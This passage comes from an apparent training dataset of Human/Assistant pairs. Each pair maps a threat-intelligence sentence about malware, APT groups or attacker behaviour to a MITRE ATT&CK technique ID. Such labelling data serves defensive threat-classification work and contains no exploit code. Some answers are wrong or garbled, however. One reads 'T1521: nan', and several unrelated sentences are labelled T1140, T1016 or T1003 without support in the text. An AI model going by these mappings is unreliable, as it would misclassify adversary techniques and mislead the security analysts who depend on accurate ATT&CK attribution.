or the Caesar cipher.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Threat Group-3390 has obtained and used tools such as Impacket, pwdump, Mimikatz, gsecdump, NBTscan, and Windows Credential Editor.### Assistant: T1588: Obtain Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RTM uses the command line and rundll32.exe to execute.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Hildegard has modified /etc/ld.so.preload to intercept shared library import functions.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,All of this can be done by using native Windows commands, but it has also been added as a feature in red teaming tools.### Assistant: T1563: Remote Service Session Hijacking" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT39 has used a command line utility and a network scanner written in python.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kobalos encrypts all strings using RC4 and bundles all functionality into a single function call.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Fox Kitten has used a Twitter account to communicate with ransomware victims.### Assistant: T1585: Establish Accounts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Lokibot has used several packing methods for obfuscation.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ESET’s analysis of a recent backdoor used by TeleBots – the group behind the massive NotPetya ransomware outbreak – uncovers strong code similarities to the Industroyer main backdoor, revealing a rumored connection that was not previously proven The post New TeleBots backdoor: First evidence linking Industroyer to NotPetya appeared first on WeLiveSecurity### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,In some cases, these files can be copied and reused on another machine or the contents can be read and then used to authenticate without needing to copy any files.### Assistant: T1552: Unsecured Credentials" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,P8RAT has the ability to ""sleep"" for a specified time to evade detection.### Assistant: T1497: Virtualization/Sandbox Evasion" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RDAT can also embed data within a BMP image prior to exfiltration.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Information from these sources may reveal opportunities for other forms of reconnaissance or Search Open Websites/Domains, establishing operational resources or Compromise Infrastructure, and/or initial access or Trusted Relationship.### Assistant: T1596: Search Open Technical Databases" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,GALLIUM compressed and staged files in multi-part archives in the Recycle Bin prior to exfiltration.### Assistant: T1074: Data Staged" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SEASHARPEE can execute commands on victims.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,These files can be parsed with lnk-parser to extract all contents### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TrickBot collects a list of install programs and services on the system’s machine.### Assistant: T1007: System Service Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TrickBot has used a VNC module to monitor the victim and collect information to pivot to valuable systems on the network GCMAN uses VNC for lateral movement.### Assistant: T1021: Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Shamoon can impersonate tokens using LogonUser, ImpersonateLoggedOnUser, and ImpersonateNamedPipeClient.### Assistant: T1134: Access Token Manipulation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,DEATHRANSOM can use HTTPS to download files.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,By default, VNC uses the system's authentication, but it can be configured to use credentials specific to VNC.### Assistant: T1021: Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT41 leveraged PowerShell to deploy malware families in victims’ environments.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may leverage external-facing remote services to initially access and/or persist within a network.### Assistant: T1133: External Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Rifdoor has added four additional bytes of data upon launching, then saved the changed version as C:\ProgramData\Initech\Initech.exe.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The following run keys are created by default on Windows systems: * HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run * HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce * HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run * HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce Run keys may exist under multiple hives.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The IP address in the lateral movement techniques was substituted with the local machine IP address to achieve code execution on the system### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,HiddenWasp communicates with a simple network protocol over TCP.### Assistant: T1095: Non-Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,IcedID has created a scheduled task that executes every hour to establish persistence.### Assistant: T1053: Scheduled Task/Job" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT39 has used the BITS protocol to exfiltrate stolen data from a compromised host.### Assistant: T1197: BITS Jobs" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The BlackEnergy 3 variant drops its main DLL component and then creates a .lnk shortcut to that file in the startup folder.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,bat: A batch file to set up the service COMSysApp, for an x64 system bat: A batch file to set up the service COMSysApp, for an x86 system ini: A data file with Base64-encoded data for connecting to an FTP server### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ramsay has been executed through malicious e-mail attachments.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Similar to Process Injection, these values can be abused to obtain elevated privileges by causing a malicious DLL to be loaded and run in the context of separate processes on the computer.### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,These native APIs are leveraged by the OS during system boot as well as carrying out tasks and requests during routine operations.### Assistant: T1106: Native API" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may abuse Windows Management Instrumentation to execute malicious commands and payloads.### Assistant: T1047: Windows Management Instrumentation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,EnvyScout can use cmd.exe to execute malicious files on compromised hosts.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,CHM files are commonly distributed as part of the Microsoft HTML Help system.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,A version of KONNI drops a Windows shortcut on the victim’s machine to establish persistence.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Hacking Team UEFI Rootkit is a UEFI BIOS rootkit developed by the company Hacking Team to persist remote access software on some targeted systems.### Assistant: T1014: Rootkit" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PROMETHIUM has signed code with self-signed certificates.### Assistant: T1553: Subvert Trust Controls" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SDBbot has the ability to add a value to the Registry Run key to establish persistence if it detects it is running with regular user privilege.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,XAgentOSX contains the getProcessList function to run ps aux to get running processes.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SLOTHFULMEDIA can inject into running processes on a compromised host.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The command does not attempt to kill the specific Office process that would load the particular delivery document, such as Excel in the case of this “.xlam” file, but instead attempts to kill processes associated with Word, Excel, PowerPoint and Publisher### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sandworm Team has exploited vulnerabilities in Microsoft PowerPoint via OLE objects and Microsoft Word via crafted TIFF images .### Assistant: T1203: Exploitation for Client Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,LightNeuron uses AES to encrypt C2 traffic.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Essentially, we are discussing ongoing activity revolving around several malware families: KopiLuwak and IcedCoffeer Carbon Mosquito WhiteBear Technical Rattle Turla’s Shifting to Scripting KopiLuwak and IcedCoffee, WhiteBear, and WhiteAtlas Since at least 2015 Turla has leveraged Javascript, powershell, and wsh in a number of ways, including in their malware dropper/installation operations as well as for implementing complete backdoors### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Gorgon Group malware can create a .lnk file and add a Registry Run key to establish persistence.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Launch Agents are often installed to perform updates to programs, launch user specified programs at login, or to conduct other developer tasks.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ZeroT can download additional payloads onto the victim.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT41 collected MAC addresses from victim machines.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PowerDuke has commands to get the current user's name and SID.### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT29 used 7-Zip to decode its Raindrop malware.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Note: Cached credentials for Windows Vista are derived using PBKDF2.### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PLATINUM is capable of using Windows hook interfaces for information gathering such as credential access.### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The device with the associated IP address directly replies with its MAC address.### Assistant: T1557: Adversary-in-the-Middle" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Machete had a module in its malware to find, encrypt, and upload files from fixed and removable drives.### Assistant: T1025: Data from Removable Media" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,WINERACK can create a reverse shell that utilizes statically-linked Wine cmd.exe code to emulate Windows command prompt commands.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Magic Hound malware has used IRC for C2.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Commands such as net user and net localgroup of the Net utility and id and groupson macOS and Linux can list local users and groups.### Assistant: T1087: Account Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,For example, when a user opens a command-line interface or remotely logs in a login shell is initiated.### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SLOTHFULMEDIA can enumerate open ports on a victim machine.### Assistant: T1049: System Network Connections Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,When enabled, a user requesting access to a resource initiates communication with the Domain Controller by sending an Authentication Server Request message with a timestamp that is encrypted with the hash of their password.### Assistant: T1558: Steal or Forge Kerberos Tickets" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Figure 9: Example of callback Earlier versions of UPPERCUT used the hard-coded string “this is the encrypt key” for Blowfish encryption when communicating with a C2### Assistant: T1521: nan" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Skidmap has the ability to replace the pam_unix.so file on an infected machine with its own malicious version that accepts a specific backdoor password for all users.### Assistant: T1556: Modify Authentication Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This activity may be used to enable follow-on behaviors such as Network Sniffing or Transmitted Data Manipulation.### Assistant: T1557: Adversary-in-the-Middle" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,InnaputRAT launches a shell to execute commands on the victim’s machine.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Installing IFEO mechanisms may also provide Persistence via continuous triggered invocation.### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Gathering this information may reveal opportunities for other forms of reconnaissance or Search Open Websites/Domains, establishing operational resources or Compromise Infrastructure, and/or initial access .### Assistant: T1590: Gather Victim Network Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Tropic Trooper has executed commands through Microsoft security vulnerabilities, including CVE-2017-11882, CVE-2018-0802, and CVE-2012-0158.### Assistant: T1203: Exploitation for Client Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may modify the SSH authorized_keys file to maintain persistence on a victim host.### Assistant: T1098: Account Manipulation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Skidmap has the ability to check whether the infected system’s OS is Debian or RHEL/CentOS to determine which cryptocurrency miner it should use.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may temporarily modify domain policy, carry out a malicious action, and then revert the change to remove suspicious indicators.### Assistant: T1484: Domain Policy Modification" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cobalt Strike's ""beacon"" payload is capable of capturing screenshots.### Assistant: T1113: Screen Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may use flaws in the permissions for Registry keys related to services to redirect from the originally specified executable to one that they control, in order to launch their own code when a service starts.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Azorult has also downloaded a ransomware payload called Hermes.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Silence can create, delete, or modify a specified Registry key or value.### Assistant: T1112: Modify Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BRONZE BUTLER has used PowerShell for execution.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The macro contains malicious code that attempts to download content from a remote server### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Inception has used malicious HTA files to drop and execute malware.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Hildegard has used masscan to search for kubelets and the kubelet API for additional running containers.### Assistant: T1613: Container and Resource Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may create and cultivate social media accounts that can be used during targeting.### Assistant: T1585: Establish Accounts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FatDuke can be controlled via a custom C2 protocol over HTTP.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cobalt Strike can install a new service.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Gazer has commands to delete files and persistence mechanisms from the victim.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,WMI subscription execution is proxied by the WMI Provider Host process and thus may result in elevated SYSTEM privileges.### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Information about victims may be available in various online sites, such as social media, new sites, or those hosting information about business operations such as hiring or requested/rewarded contracts.### Assistant: T1593: Search Open Websites/Domains" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,When performing PtH, valid password hashes for the account being used are captured using a Credential Access technique.### Assistant: T1550: Use Alternate Authentication Material" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,When a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate.### Assistant: T1553: Subvert Trust Controls" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,An adversary may use at.exe in Windows environments to execute programs at system startup or on a scheduled basis for persistence.### Assistant: T1053: Scheduled Task/Job" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Group Policy allows for centralized management of user and computer settings in Active Directory .### Assistant: T1615: Group Policy Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,It then takes note of the infected machine’s IP address, user, domain, hostname, OS and Service Pack, and the username and password combination that worked during the brute force routine### Assistant: T1110: Brute Force" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Additionally, some of this early activity shares a similarity with current FIN7 operations – the use of Power Admin PAExec for lateral movement### Assistant: T1021: Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FIN6 has created Windows services to execute encoded PowerShell commands.### Assistant: T1569: System Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Stuxnet searches the Registry for indicators of security programs.### Assistant: T1012: Query Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TrickBot has used an email with an Excel sheet containing a malicious macro to deploy the malware Emotet has been delivered by phishing emails containing attachments.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Turla has obtained and customized publicly-available tools like Mimikatz.### Assistant: T1588: Obtain Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may obtain and abuse credentials of a domain account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion.### Assistant: T1078: Valid Accounts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,CORESHELL collects hostname, volume serial number and OS version data from the victim and sends the information to its C2 server.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Orangeworm has used HTTP for C2.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Octopus has relied upon users clicking on a malicious attachment delivered through spearphishing.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Command and control information can be encoded using a standard data encoding system that adheres to existing protocol specifications.### Assistant: T1132: Data Encoding" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,H1N1 has functionality to copy itself to network shares.### Assistant: T1080: Taint Shared Content" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,WMI can be accessed using a variety of tools, including the Windows WMI Command-line (wmic.exe), or through APIs accessible to programming and scripting languages such as PowerShell### Assistant: T1047: Windows Management Instrumentation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,78 runin.bin List of processes names and associated plugins should be run inside these processes### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,hcdLoader provides command-line access to the compromised system.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,CostaRicto has used scheduled tasks to download backdoor tools.### Assistant: T1053: Scheduled Task/Job" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Carbanak has a command to delete files.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Trojan.Karagany can gather information about the user on a compromised host.### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Mivast has the capability to download and execute .exe files.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework., net localgroup ### Assistant: T1087: Account Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries can abuse MSBuild to proxy execution of malicious code.### Assistant: T1127: Trusted Developer Utilities Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,An adversary can create the appropriate folders/files in the StartupItems directory to register their own persistence mechanism .### Assistant: T1037: Boot or Logon Initialization Scripts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,OilRig has also used certutil to decode base64-encoded files on victims.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Gazer versions are signed with various valid certificates; one was likely faked and issued by Comodo for ""Solid Loop Ltd,"" and another was issued for ""Ultimate Computer Support Ltd."" Janicab used a valid AppleDeveloperID to sign the code to get past security restrictions.### Assistant: T1553: Subvert Trust Controls" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,In total, nearly 13,000 sets of credentials are included in the data dump### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may abuse verclsid.exe to execute malicious payloads.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Dragonfly 2.0 compromised user credentials and used valid accounts for operations.### Assistant: T1078: Valid Accounts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Denis uses ipconfig to gather the IP address from the system.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,In cloud environments, adversaries may stage data within a particular instance or virtual machine before exfiltration.### Assistant: T1074: Data Staged" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Additionally, it is possible to avoid setting this flag using Drive-by Compromise, which may bypass Gatekeeper.### Assistant: T1553: Subvert Trust Controls" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kobalos replaced the SSH client with a trojanized SSH client to steal credentials on compromised systems.### Assistant: T1554: Compromise Client Software Binary" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Bazar can gain execution after a user clicks on a malicious link to decoy landing pages hosted on Google Docs.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Carbon has a command to inject code into a process.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Alternate authentication material may also be generated during the identity creation process.### Assistant: T1550: Use Alternate Authentication Material" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT32's backdoor can exfiltrate data by encoding it in the subdomain field of DNS packets.### Assistant: T1048: Exfiltration Over Alternative Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Remexi utilizes scheduled tasks as a persistence mechanism.### Assistant: T1053: Scheduled Task/Job" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Startup items execute during the final phase of the boot process and contain shell scripts or other executable files along with configuration information used by the system to determine the execution order for all startup items.### Assistant: T1037: Boot or Logon Initialization Scripts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,On Linux, adversaries may set LD_PRELOAD to point to malicious libraries that match the name of legitimate libraries which are requested by a victim program, causing the operating system to load the adversary's malicious code upon execution of the victim program.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MoonWind obtains the victim IP address.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Valak has the ability to enumerate local admin accounts.### Assistant: T1087: Account Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,It then uses WebDAV to upload to a Box cloud drive.### Assistant: T1048: Exfiltration Over Alternative Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,In total, 29 unique CARROTBAT samples have been identified to date, containing a total of 12 confirmed unique decoy documents### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT39 has sent spearphishing emails in an attempt to lure users to click on a malicious attachment.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cobalt Strike will break large data sets into smaller chunks for exfiltration.### Assistant: T1030: Data Transfer Size Limits" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT3 has used a keylogging tool that records keystrokes in encrypted files.### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,NativeZone has used rundll32 to execute a malicious DLL.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Pteranodon creates various subdirectories under %Temp%\reports\% and copies files to those subdirectories.### Assistant: T1074: Data Staged" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Instead of hijacking existing DNS servers, adversaries may opt to configure and run their own DNS servers in support of operations.### Assistant: T1583: Acquire Infrastructure" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,When it is executed, it creates two files: an LNK file that points to %system32%\rundll32.exe, and the FELIXROOT loader component### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Specific storage locations vary based on platform and/or application, but browser bookmarks are typically stored in local files/databases.### Assistant: T1217: Browser Bookmark Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,In Windows, adversaries may hide user accounts via settings in the Registry.### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Chimera has queried Registry keys using reg query \\\HKU\\SOFTWARE\Microsoft\Terminal Server Client\Servers and reg query \\\HKU\\Software\Microsoft\Windows\CurrentVersion\Internet Settings.### Assistant: T1012: Query Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The different components of Machete are executed by Windows Task Scheduler.### Assistant: T1053: Scheduled Task/Job" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BLINDINGCAN has encoded its C2 traffic with Base64.### Assistant: T1132: Data Encoding" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT38 has obtained and used open-source tools such as Mimikatz.### Assistant: T1588: Obtain Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Bazar can execute a PowerShell script received from C2.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Bundlore has the ability to enumerate what browser is being used as well as version information for Safari.### Assistant: T1518: Software Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TeamTNT has executed PowerShell commands in batch scripts.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,An adversary may use a cloud service dashboard GUI with stolen credentials to gain useful information from an operational cloud environment, such as specific services, resources, and features.### Assistant: T1538: Cloud Service Dashboard" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RTLO is a non-printing Unicode character that causes the text that follows it to be displayed in reverse.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,HyperStack can add the name of its communication pipe to HKLM\SYSTEM\\CurrentControlSet\\Services\\lanmanserver\\parameters\NullSessionPipes.### Assistant: T1112: Modify Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,In addition to obfuscation techniques, it also has the ability to detect security tools on the analysis machine, and can also shut down the system if it detects the presence of such tools### Assistant: T1518: Software Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,AppleSeed can stage files in a central location prior to exfiltration.### Assistant: T1074: Data Staged" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The SAM is a database file that contains local accounts for the host, typically those found with the net user command.### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The CALENDAR malware communicates through the use of events in Google Calendar.### Assistant: T1102: Web Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,They then identify the Exchange server and attempt to install the OwaAuth web shell### Assistant: T1505: Server Software Component" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,OSX/Shlayer can install malicious Safari browser extensions to serve ads.### Assistant: T1176: Browser Extensions" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,We have covered recent FIN7 activity in previous public blog posts: FIN7 Spear Phishing Campaign Targets Personnel Involved in SEC Filings FIN7 Evolution and the Phishing LNK To SDB, Or Not To SDB: FIN7 Leveraging Shim Databases for Persistence The FireEye iSIGHT Intelligence MySIGHT Portal contains additional information on our investigations and observations into FIN7 activity### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Gold Dragon deletes one of its files, 2.hwp, from the endpoint after establishing persistence.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,These processes may automatically execute specific binaries as part of their functionality or to perform other actions.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,(Source: Dell SecureWorks) As shown in Figure 10, the unpacked JavaScript code reveals an iframe pointing to an IP address that is hosting the exploit### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This DLL can be located in C:\Windows\System32 and will be loaded by the print spooler service, spoolsv.exe, on boot.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Blue Mockingbird has masqueraded their XMRIG payload name by naming it wercplsupporte.dll after the legitimate wercplsupport.dll file.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SpeakUp uses the cat /proc/cpuinfo | grep -c “cpu family” 2>&1 command to gather system information.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Micropsia executes an RAR tool to recursively archive files based on a predefined list of file extensions .### Assistant: T1119: Automated Collection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kerrdown has gained execution through victims opening malicious files.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model and Windows Remote Management .### Assistant: T1047: Windows Management Instrumentation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RobbinHood uses cmd.exe on the victim's computer.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Naid collects a unique identifier from a compromised host.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT33 has used FTP to exfiltrate files .### Assistant: T1048: Exfiltration Over Alternative Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may leverage Confluence repositories to mine valuable information.### Assistant: T1213: Data from Information Repositories" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Commands included in XDG autostart entries with execute after user logon in the context of the currently logged on user.### Assistant: T1547: Boot or 